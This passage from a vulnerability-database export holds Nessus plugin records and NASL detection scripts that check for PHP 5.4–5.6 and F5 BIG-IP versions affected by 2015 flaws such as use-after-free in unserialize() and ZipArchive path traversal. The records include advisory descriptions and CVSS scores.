get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL17377\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.4.0-11.5.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.1\",\"11.5.4\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n# PEM\nvmatrix[\"PEM\"] = 
make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\",\"11.6.1\",\"11.5.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:29", "description": "03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long timeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST data). (cmb) * Fixed bug #70198 (Checking liveness does not work as expected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use After Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219 (Use after free vulnerability in session deserializer). (taoguangchen at icloud dot com) **CLI server:** * Fixed bug #66606 (Sets HTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug #70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug #70266 (DateInterval::__construct.interval_spec is not supposed to be optional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring text after null byte). (cmb) **EXIF:** * Fixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes). (Stas) **hash:** * Fixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug #69833 (mcrypt fd caching not working). 
(Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232 (Incorrect bump-along behavior with \\K and empty string match). (cmb) * Fixed bug #70345 (Multiple vulnerabilities related to PCRE functions). (Anatol Belski) **SOAP:** * Fixed bug #70388 (SOAP serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref (segfault) in spl_autoload via ob_start). (hugh at allthethings dot co dot nz) * Fixed bug #70303 (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage). (taoguangchen at icloud dot com) * Fixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails for very large and very small WBMP). (cmb) * Fixed bug #70157 (parse_ini_string() segmentation fault with INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782 (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-21T00:00:00", "type": "nessus", "title": "Fedora 23 : php-5.6.13-1.fc23 (2015-14978)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-14978.NASL", "href": "https://www.tenable.com/plugins/nessus/86030", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-14978.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86030);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\");\n script_xref(name:\"FEDORA\", value:\"2015-14978\");\n\n script_name(english:\"Fedora 23 : php-5.6.13-1.fc23 (2015-14978)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"03 Sep 2015, **PHP 5.6.13** **Core:** * Fixed bug #69900 (Too long\ntimeout on pipes). (Anatol) * Fixed bug #69487 (SAPI may truncate POST\ndata). (cmb) * Fixed bug #70198 (Checking liveness does not work as\nexpected). (Shafreeck Sea, Anatol Belski) * Fixed bug #70172 (Use\nAfter Free Vulnerability in unserialize()). (Stas) * Fixed bug #70219\n(Use after free vulnerability in session deserializer). 
(taoguangchen\nat icloud dot com) **CLI server:** * Fixed bug #66606 (Sets\nHTTP_CONTENT_TYPE but not CONTENT_TYPE). (wusuopu, cmb) * Fixed bug\n#70264 (CLI server directory traversal). (cmb) **Date:** * Fixed bug\n#70266 (DateInterval::__construct.interval_spec is not supposed to be\noptional). (cmb)\n\n - Fixed bug #70277 (new DateTimeZone($foo) is ignoring\n text after null byte). (cmb) **EXIF:** * Fixed bug\n #70385 (Buffer over-read in exif_read_data with TIFF IFD\n tag byte value of 32 bytes). (Stas) **hash:** * Fixed\n bug #70312 (HAVAL gives wrong hashes in specific cases).\n (letsgolee at naver dot com) **MCrypt:** * Fixed bug\n #69833 (mcrypt fd caching not working). (Anatol)\n **Opcache:** * Fixed bug #70237 (Empty while and\n do-while segmentation fault with opcode on CLI enabled).\n (Dmitry, Laruence) **PCRE:** * Fixed bug #70232\n (Incorrect bump-along behavior with \\K and empty string\n match). (cmb) * Fixed bug #70345 (Multiple\n vulnerabilities related to PCRE functions). (Anatol\n Belski) **SOAP:** * Fixed bug #70388 (SOAP\n serialize_function_call() type confusion / RCE). (Stas)\n **SPL:** * Fixed bug #70290 (NULL pointer deref\n (segfault) in spl_autoload via ob_start). (hugh at\n allthethings dot co dot nz) * Fixed bug #70303\n (Incorrect constructor reflection for ArrayObject).\n (cmb) * Fixed bug #70365 (Use-after-free vulnerability\n in unserialize() with SplObjectStorage). (taoguangchen\n at icloud dot com) * Fixed bug #70366 (Use-after-free\n vulnerability in unserialize() with\n SplDoublyLinkedList). (taoguangchen at icloud dot com)\n **Standard:** * Fixed bug #70052 (getimagesize() fails\n for very large and very small WBMP). (cmb) * Fixed bug\n #70157 (parse_ini_string() segmentation fault with\n INI_SCANNER_TYPED). (Tjerk) **XSLT:** * Fixed bug #69782\n (NULL pointer dereference). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1260748\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166632.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bfa72a25\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"php-5.6.13-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:23", "description": "Versions of PHP 5.4.x prior to 5.4.45, 5.5.x prior to 5.5.29, or 5.6.x prior to 5.6.13 are vulnerable to the following issues :\n\n - A use-after-free error exists in the unserialize() function in 'ext/spl/spl_observer.c'. The issue is triggered as user-supplied input is not sanitized. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - A type confusion flaw affects the serialize_function_call() function in 'ext/soap/soap.c'. The issue is triggered when handling input passed via the header field. This may allow a remote attacker to execute arbitrary code.\n - A use-after-free error affects the object_custom() function in 'ext/standard/var_unserializer.c'. The issue is triggered when handling user-supplied input. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - A use-after-free error affects the unserialize() function in 'ext/spl/spl_dllist.c'. The issue is triggered during the deserialization of user-supplied input. 
This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - An out-of-bounds read flaw in the exif_process_IFD_TAG() function in 'ext/exif/exif.c' that is triggered when handling TIFF IFD tags. This may allow a context-dependent attacker to crash an application linked against PHP or potentially disclose memory contents.\n - An overflow condition exists in the php_pcre_match_impl() function in 'ext/pcre/php_pcre.c'. The issue is triggered as user-supplied input is not properly validated. This may allow a remote attacker to cause a heap-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\n - A flaw exists in the php_pcre_split_impl() function in 'ext/pcre/php_pcre.c'. The flaw is triggered during the handling of offsets that consist of a start and end position within the subject string, which can cause an exhaustion of memory resources. This may allow a remote attacker to exhaust available memory.\n - An overflow condition affects the php_pcre_replace_impl() function in 'ext/pcre/php_pcre.c'. The issue is triggered as user-supplied input is not properly validated when handling offsets. This may allow a remote attacker to cause a heap-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\n - A use-after-free error exists in the php_var_unserialize() function of the session deserializer (php_binary/php_serialize). The issue is triggered when deserializing multiple forms of data. This may allow a remote attacker to dereference already freed memory and potentially execute arbitrary code.\n - A NULL pointer dereference flaw exists in the xsl_ext_function_php() function in 'ext/xsl/xsltprocessor.c' that is triggered as checks are not properly performed on user-supplied input. 
This may allow a remote attacker to cause a denial of service.\n - A flaw exists that allows traversing outside of a restricted path. The issue is due to the php_zip_extract_file() function in 'ext/zip/php_zip.c' not properly sanitizing user input, specifically path traversal style attacks (e.g. '../') passed to the ZipArchive::extractTo() method. This may allow a remote attacker to create arbitrary directories.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-14T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.45 / 5.5.x < 5.5.29 / 5.6.x < 5.6.13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6834", "CVE-2015-6835"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "8861.PRM", "href": "https://www.tenable.com/plugins/nnm/8861", "sourceData": "Binary data 8861.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:04:14", "description": "According to its banner, the version of PHP running on the remote web server is 5.5.x prior to 5.5.29. It is, therefore, affected by the following vulnerabilities :\n\n - A directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c could allow a remote attacker to create arbitrary empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to the unserialize() function. A remote attacker can exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field. 
A remote attacker can exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to improper validation of input from the libxslt library. A remote attacker can exploit these flaws to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-09-10T00:00:00", "type": "nessus", "title": "PHP 5.5.x < 5.5.29 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_5_29.NASL", "href": "https://www.tenable.com/plugins/nessus/85886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85886);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n script_bugtraq_id(\n 76644,\n 76649,\n 76652,\n 76733,\n 76734,\n 76738\n );\n\n script_name(english:\"PHP 5.5.x < 5.5.29 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.5.x prior to 5.5.29. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c\n could allow a remote attacker to create arbitrary\n empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to\n the unserialize() function. A remote attacker can\n exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the\n php_var_unserialize() function. A remote attacker, using\n a crafted serialize string, can exploit this to execute\n arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the\n serialize_function_call() function due to improper\n validation of the headers field. A remote attacker can\n exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to\n improper validation of input from the libxslt library. A\n remote attacker can exploit thse flaws to have an\n unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function\n in file php_zip.c due to improper sanitization of\n user-supplied input. 
An unauthenticated, remote attacker\n can exploit this to create arbitrary directories outside\n of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.5.29\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.5.29 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.5)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.5\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.5.x\", port);\n\nif (version =~ \"^5\\.5\\.([0-9]|1[0-9]|2[0-8])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.5.29' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:04:14", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.13. It is, therefore, affected by multiple vulnerabilities :\n\n - A directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c could allow a remote attacker to create arbitrary empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to the unserialize() function, which a remote attacker can exploit to execute arbitrary code. 
(CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field, which a remote attacker can exploit to have unspecified impact. (CVE-2015-6836)\n\n - A flaw exists in the XSLTProcessor class due to improper validation of input from the libxslt library, which a remote attacker can exploit to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\n - A NULL pointer dereference flaw exists in the spl_autoload() function in file php_spl.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the parse_ini_file() and parse_ini_string() functions due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the CLI SAPI Web Server due to improper sanitization of user-supplied input. 
An unauthenticated, remote attacker can exploit this to access arbitrary files outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-09-10T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_13.NASL", "href": "https://www.tenable.com/plugins/nessus/85887", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85887);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n script_bugtraq_id(\n 76644,\n 76649,\n 76652,\n 76733,\n 76734,\n 76738\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.13 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.6.x prior to 5.6.13. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c\n could allow a remote attacker to create arbitrary\n empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to\n the unserialize() function, which a remote attacker can\n exploit to execute arbitrary code. (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the\n php_var_unserialize() function. A remote attacker, using\n a crafted serialize string, can exploit this to execute\n arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the\n serialize_function_call() function due to improper\n validation of the headers field, which a remote attacker\n can exploit to have unspecified impact. (CVE-2015-6836)\n\n - A flaw exists in the XSLTProcessor class due to\n improper validation of input from the libxslt library,\n which a remote attacker can exploit to have an\n unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function\n in file php_zip.c due to improper sanitization of\n user-supplied input. An unauthenticated, remote attacker\n can exploit this to create arbitrary directories outside\n of the restricted path.\n\n - A NULL pointer dereference flaw exists in the\n spl_autoload() function in file php_spl.c due to\n improper sanitization of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a PHP application to crash.\n\n - A flaw exists in the parse_ini_file() and\n parse_ini_string() functions due to improper\n sanitization of user-supplied input. An unauthenticated,\n remote attacker can exploit this to cause a PHP\n application to crash.\n\n - A flaw exists in the CLI SAPI Web Server due to improper\n sanitization of user-supplied input. 
An unauthenticated,\n remote attacker can exploit this to access arbitrary\n files outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.13 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 